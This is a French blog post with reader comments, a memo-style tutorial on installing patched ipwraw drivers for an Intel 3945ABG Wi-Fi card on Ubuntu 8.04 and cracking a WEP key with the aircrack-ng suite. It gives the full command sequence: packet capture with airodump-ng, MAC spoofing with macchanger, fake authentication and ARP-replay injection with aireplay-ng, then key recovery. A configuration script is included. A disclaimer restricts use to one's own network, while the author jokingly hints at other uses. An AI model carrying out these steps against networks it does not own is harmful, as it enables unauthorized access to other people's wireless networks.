Aircrack-NG avec une carte Wireless Intel 3945 ABG

Ce petit ‘tuto’ est plus un pense bête qu’un article, mais il est possible qu’il aide quelques personnes dans leur démarche de sécurisation de réseau Wifi (ou pas ?!)

Depuis quelques semaines j’ai un nouveau portable pour le taf, un Dell latitude D520, intégrant un chipset Intel, et ayant une carte wifi

  • $ lspci
  • c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)
  • Il se trouve que sur d’autres distributions, les drivers intégrés au kernel étaient compatibles, mais sur la petite distribution Ubuntu 8.04, les drivers ne sont plus compatible pour accepter le « mode monitor ».

    Avant de commencer tout cela, un petit rappel des faits.

    AirCrack-NG

    Aircrack-ng est un groupe d’outils de monitoring pour réseau sans fil dont l’utilisation principale est le « cassage » de clés WEP et WPA-PSK.

    Aircrack fut développé sous licence GPL par Christophe Devine (consultant en sécurité informatique) puis repris par Thomas d’Otreppe sous le nom de Aircrack-ng.

    La version 0.9, comprend entre autres les outils suivants:

    • aircrack-ng: casseur de clés WEP statiques et WPA-PSK (Nouveau type de casseur: PTW)
    • airdecap-ng: décrypteur de fichiers WEP/WPA capturés
    • aireplay-ng: programme d’injection de paquets 802.11 (disponible sous Linux et FreeBSD seulement)
    • airodump-ng: programme de capture de paquets 802.11
    • airtun-ng: programme pour la création d’une interface virtuelle

    note: Ce logiciel est conçu pour tester la sécurité de son propre réseau, l’attaque d’un réseau extérieur sans l’accord de son propriétaire est passible de peines d’emprisonnement.

    Pré-requis

    * Vous possédez une machine linux avec Hardy Heron fraîchement installé, je n’ai ni le temps ni la volonté de tester sur un système amélioré
    * Vous avez réussi à compiler / installer les précédentes versions du pilote ipwraw (ceci je l’explique par la suite)
    * Vous savez comment utiliser Aircrack-ng (un minimum)
    * Vous possédez une clé WEP (Weak Encryption Protocol :D)
    * Vous pouvez utiliser le CLI (ahhhhhhhh, linux, votre CLI, un outil puissant et un mal de tête assuré pour les néophytes … CLI = Command Line Interface … La ligne de commande)
    * Les LETTRES MAJUSCULES dans la procédure de crackage de la clé WEP sont des paramètres FICTIFS pour
    – CHANNEL, le canal qui sera reniflé / injecté
    – FILE, un nom de fichier
    – ESSID, le nom du point d’accès tels que FREEPHONIE, LIVEBOX, …
    – BSSID, le point d’accès adresse
    – MACADDRESS, votre adresse mac de la carte wifi
    * Vous l’utilisez sous votre propre risque
    * Vous savez ce que le diable va faire

    Installation

    Rien de plus simple sous Ubuntu :

    sudo apt-get install aircrack-ng macchanger

    Configuration de la carte 3945 ABG (ipw3945 ou iwl3945)

    Il se trouve donc que les drivers fournis avec la distribution ne sont pas compatible pour que aircrack-ng fonctionne correctement, et puis scanner les réseaux Wifi. Il faut donc mettre en place des « drivers alternatifs », que nous fournis gentillement le site de aircrack-ng :D

    Pré-requis

    sudo apt-get install linux-headers-`uname -r` build-essential libssl-dev macchanger

    Installation

    	
  • wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
  • tar -xjf ipwraw-ng*
  • cd ipwraw-ng
  • make
  • sudo make install
  • sudo make install_ucode
  • echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
  • sudo depmod -ae
  • Maintenant, les drivers modifiés on été installés. Il faut donc décharger les drivers « officiels » pour charger ceux qui permettrons d’utiliser Aircrack-ng (les drivers iwpraw)

    Utiliser ipwraw

    • Décharger le module ipw3945 (ou iwl3945 sur ma machine)
    • Lancer ipwraw-ng

    Le périphérique créé sera automatiquement en mode Monitor.

    sudo modprobe -r ipw3945

    ou

    sudo modprobe -r iwl3945
    sudo modprobe ipwraw

    Le nouveau périphérique créé aura comme nom wifi0

    sckyzo@sckyzo:~$ iwconfig
    lo        no wireless extensions.
    eth0      no wireless extensions.
    wifi0     unassociated  ESSID:off/any
    Mode:Monitor  Channel=1  Bit Rate=54 Mb/s
    
    

    Voila, vous pouvez maintenant utiliser aircrack-ng pour sécuriser votre Wifi (ou pas ?!)

    Bien sur, après utilisation des drivers alternatifs avec aircrack, il vous faut recharger les modules ipw3945 ou iwl3945

    sudo modprobe -r ipwraw
    sudo modprobe iwl3945

    ou

    sudo modprobe ipw3945

    Maintenant, les drivers fonctionnent (enfin). Alors que faire maintenant ? Passons à l’action :
    Ouvrer un terminal, et copier ceci :

    #!/bin/bash
    	
  • clear
  • echo "Please provide the wifi0 CHANNEL"
  • read canal
  • echo "Please provide the capture rate (best results with only 2)"
  • read rate
  • echo "Please provide the target BSSID"
  • read bssid
  • ifconfig wifi0 down
  • chmod u+wrx /sys/class/net/wifi0/device/rate
  • echo $rate >/sys/class/net/wifi0/device/rate
  • echo $canal >/sys/class/net/wifi0/device/channel
  • echo $bssid >/sys/class/net/wifi0/device/bssid
  • ifconfig wifi0 up
  • echo "Configuration completed. Ready to do packet injection"
  • Enregistrez le document tel que : wepcrackconf.sh et attribuez les droits adéquates pour qu’il puisse être exécuté.

    sudo chmod +x wepcrackconf.sh

    Crackage

    Ouvrez 4 terminaux (oui c’est beaucoup, mais il les faut)

    Premier terminal

    sudo airodump-ng wifi0

    Second terminal

    sudo su
    ./wepcrackconf.sh
    • CHANNEL, choisissez le Canal de votre choix
    • rate toujours 2
    • BSSID, donné par le terminal précédent
    exit
    sudo airodump-ng -c CHANNEL -w FILE wifi0

    Troisième terminal

    sudo macchanger -s wifi0
    sudo aireplay-ng -1 10 -e "ESSID" -a BSSID -h MAC_ADRESSE wifi0

    Quatrième terminal

    aireplay-ng -3 -b BSSID -h MAC_ADRESSE wifi0

    De retour sur le premier terminal
    Après avoir récolté assez de IV, faites Ctrl+C pour stopper l’application

    aircrack-ng FILE.cap

    IMPORTANT :
    Recueillir au moins 500000 paquets, pour casser une WEP 64-bit Hex
    Vous pouvez changer l’adresse MAC il suffit de lire les infos ou macchanger page du manuel (man macchanger)

    Si toutefois vous avez des questions, n’hésitez pas.
    Je complèterai l’article au fur et à mesure de ma pensé

    Mise à jour : Aircrack-ng Configuration et mise en route
    – Utilisation de macchanger (apt-get)
    – Lancement de Aircrack et sa suite (airodump, airemachin ….)
    – Crackage clé WEP
    – Script
    Bien évidemment, je suis resté très simpliste sur les termes et les fonctions car je pars du principe que je m’adresse à des gens connaissant le domaine. Sinon, un lien (ci dessous) renvois sur un tuto assez complexe et instructif bien qu’un peu depassé (mais tant que ça fonctionne … hein ^^)

    Liens utiles :
    http://fr.wikipedia.org/wiki/Mode_moniteur
    http://fr.wikipedia.org/wiki/Aircrack
    http://www.aircrack-ng.org
    http://www.tuto-fr.com/tutoriaux/tutorial-crack-wep-aircrack.php

    Publié par

    SckyzO

    Je m'appelle Thomas, j'ai 26 ans, je suis un passionné des nouvelles technologies. Je suis ingénieur sytème spécialisé dans l'Open Source. Webdesigner à mes heures perdues, développeur, geek invétéré, je tiens ce blog pour permettre à mes lecteurs de suivre l'actualité sur les Logiciels Libres. Je suis investis dans plusieurs projets libres tel que Planet-Libre.org et d'autres projets libres. N'hésitez pas a me contacter si vous souhaitez que j'écrive des articles sur des thèmes particuliers :-)

    20 réflexions au sujet de « Aircrack-NG avec une carte Wireless Intel 3945 ABG »

    1. « Maintenant, les drivers modifiés on était installé »

      Quelle horreur ! Remplace par « Maintenant, les drivers modifiés ont été installés »

      Note: le texte noir sur fond noir du captcha est pas pratique.

      Edit: en fait tout le CSS de ton blog est ignoble, quand je passe le curseur sur mon commentaire, il prends un fond jaune mais le texte reste blanc…

    2. Entièrement d’accord avec le commentaire ci-dessus, mais ce billet est par contre très instructif. Je suis quand même un peu resté sur ma faim : je connais aircrack-ng, mais j’attendais que tu fasses une description de comment l’utiliser, au moins pour les autres…

    3. @romain
      Merci pour la GROSSE faute d’orthographe (honte honte … bouhhhh)

      @yoho
      il s’agit d’une explication plus approfondi, et si tu lis l’upgrade de l’article, tu verras bien que ce n’est pas un copier collé.
      De plus, c’est comme je le dis, un pense bête …

      Pour ce qui est de l’explication de comment se servir de Aircrack-ng … Est ce bien utile ??
      Tellement de tuto sur le Net. Je verrais en fonction de mon humeur.

    4. Salut Sckyzo, un GRAND merci pour ce tuto super bien expliqué qui m’a enfin permis de faire marcher aircrack sur mon portable (intel 3945abg) ! C’est la providence qui t’a mis sur mon chemin =)
      A part de fréquents plantages au cours de l’injection, ça fonctionne nickel après quelques tentatives ^^

      Cependant, j’ai deux questions :
      -Peut-on se passer du script wepcrackconf.sh ? Pour avoir suivi d’autres tutos, je n’ai rien vu de semblable. Est-il obligatoire pour la carte 3945abg ?
      -Saurais-tu comment redémarrer le network-manager d’ubuntu après avoir rechargé ipw3945 ? Car pour l’instant, je n’ai d’autre solution que de redémarrer le pc pour me reconnecter au wifi.

      Merci en tout cas pour ton pense-bête =)
      Youri

    5. Bonjour Youri,

      Tout d’abord, merci pour les compliments, c’est très gentil à toi.
      Alors je vais répondre dans l’ordre :
      Oui, bien entendu, on peut se passer du script, mais le principe de celui ci est d’optimiser le rendement de aircrack, et de faciliter la tache du programme. Alors tu peux t’en passer, tu peux même utiliser aircrack sans le script, mais il te faudra faire d’autre truc (bien que cela soit en réalité pas vraiment indispensable). Donc si tu fais sans, ya pas de soucis. Tu verras la différence par toi même.

      Pour ce qui est de redemarrer Network-Manager, personnelement, je n’arrete pas le programme, mais je crois que ce que tu veux dire, c’est redemmarer le bon driver. Si c’est bien cela, alors c’est extrement simple (je l’explique dans le tuto d’ailleurs) :
      tu fais :

      sudo modprobe -r ipwraw
      sudo modprobe iwl3945 ou ipw3945
      

      Sinon, tu fais un petit script :
      sudo nano /home/user/aircrack/driver_original (en partant du principe que tu t’es fait un dossier aircrack)
      #!/bin/sh
      sudo modprobe -r ipwraw
      sudo modprobe iwl3945

      ensuite tu le rend executable :
      chmod +x /home/user/aircrack/driver_original

      Et ensuite il te suffira juste, une fois aircrack terminé et le crackage de la wep fini, qu’a lancer le script :
      $sudo  ./home/user/aircrack/driver_original

      Et hop, normalement cela devrait fonctionner :-)

      N’hésite pas a poster un comm si c’est bon ou si ça ne foncitonne pas afin que je rectifie, car j’ai fais ca de tête, et surtout, je suis dans les antilles là, donc un peu déconnecté :)

    6. Salut Sckyzo et merci beaucoup pour tes réponses.

      Le problème en fait avec Network-Manager, c’est qu’il plante carrément lorsque je décharge iwl3945 avec modprobe. Et après, une fois le driver relancé, je ne sais pas comment le faire revenir. J’ai tenté un « network-manager » dans la console, en vain. Je suis donc obligé de redémarrer.
      Le driver en lui-même ne pose pas de problème particulier.
      Je précise que j’utilise Ubuntu 8.10 (j’avais besoin du kernel 2.6.25 pour faire fonctionner ipwraw, et j’ai pas réussi à compiler le kernel par moi-même, j’ai donc mis à jour en bêta).

      Un autre problème mineur avec aireplay : lorsque je lance un mode quel qu’il soit (deauth, injection de paquets…), il me met un truc du style « current channel is X, but the AP uses channel Y ». Je dois relancer plusieurs fois avant de tomber sur le bon channel. Mais bon, c’est pas très grave encore.

      Désolé de te poser autant de questions, et merci pour ton aide =)
      Si tu souhaites continuer la conversation autrepart que dans les commentaires, fais-m’en part.
      Youri

    7. Re,

      Je ne parviens plus à utiliser ma carte wifi depuis deux ou trois mises à jour d’ubuntu. iwl3945 est bel et bien installé; ipwraw marche bien. Mais en mode managed, j’arrive plus à me connecter.
      Suis-je le seul ?

    8. Salut scKyzO
      Tout dabord merci pour le tuto , j’utilise un ordi potable pour le boulot avec une carte intel ,ce tuto ma bien aider , mais j’ai un petit probleme avec aireplay , peut tu me dire quel est le probleme :
      quand je lance aireplay-ng ,ca fonctionne parfaitement au debut , j’arrive a recolter les IVS , mais au bout d’un moment ,la commande aireplay me renvoi « got a deauthentication (waiting 5 seconds )  » du coup ca stop ma capture d’ IVS , le message revient en boucle , donc ,si tu pouver me renseigner ? merci

      Et egalement te dire que ton site est vraiment vraiment pas mal , continue comme ca

    9. Bonjour a toi

      Merci pour ce super pense bête. Moi qui croyais etre obligé de changer de carte wifi pour tester aircrack, j’avais d’ailleurs laissé tombé. En tout cas l’ensemble se lance mais j’ai un petit soucis quand me. Lors de la derniere phase, le 4eme terminal, le pc plante carrément. Freeze complet sans prévenir, obligé de couper l’alim pour s’en sortir.

      C’est un laptop dell inspiron de l’année derniere.

      Aurais tu une idée??

      Merci d’avance

    10. Salut Skyzo

      Premièrement, merci pour ce tutoriel qui m’aide beaucoup, cependant j’ai un problême lors de la création
      du fichier wepcrackconf.sh Je recoit toujours le message:
      chmod: ne peut accéder `wepcrackconf.sh': Aucun fichier ou dossier de ce type

      Merci, j’ai Ubuntu 8.04 et ça me semble simple mais je recoit toujours ce message…

    11. @fanval :
      Bonjour et excuse moi du retard, je n’avais pas vu ton commentaire. Alors oui, effectivement, je n’avais pas fait attention, mais cela freeze totalement mon PC aussi. Après quelques test, c’est très simple. Depuis la version 8.10 de ubuntu (peut etre la 8.04 même) les drivers ont inclu le mode monitor (ca c’est une bonne nouvelle).
      Donc plus besoin de les patcher et de faire tout cela.
      Tente de faire la manipulation avec les drivers existant.

      @Francklin :
      Si tu n’arrives pas a accéder au fichier, c’est tout simplement que tu ne l’a pas crée ou que le chemin n’est pas bon.
      Fait un :
      nano $USER/Bureau/wepcrackconf.sh
      sudo chmod +x $USER/Bureau/wepcrackconf.sh

      ceci devrait fonctionner

      Cordialement,

    12. ok, merci de ta réponse. Je suis sur 8.04 mais je ne crois pas que les drivers soient compatibles…
      $ sudo airodump-ng wlan0
      ioctl(SIOCSIWMODE) failed: Device or resource busy

      ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211
      or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled:
      run ‘ifconfig wlan0 up; iwconfig wlan0 mode Monitor channel ‘
      Sysfs injection support was not found either.

      En réalité, jétais sur 9.04 mais ce problème : http://forum.ubuntu-fr.org/viewtopic.php?id=308601&p=2 (mon intervention sous fanval) d’extinction de pc m’a fait revenir en arrière. Peut etre aurais tu aussi une idée la dessus?!

      a+

    13. bonjour, je n’arrive pas a installer le nouveau driver pour pouvoir injecter des paquets.

      Quand j’arrive a l’étape >make

      ca me marque en premier :
      WARNING: Symbol version dump /usr/src/linux-source-2.6.34/Module.symvers
      is missing; modules will have no dependencies and modversions.

      Comment puis-je remmédié a ce probleme ?
      merci

      1. Le tuto n’est plus vraiment d’actualité, maintenant par défaut il ne faut plus installer ce driver. Et comme je n’ai plus le même portable, il faudrait que je fasse un article plus générique ;-)

    Laisser un commentaire

    Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

    Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>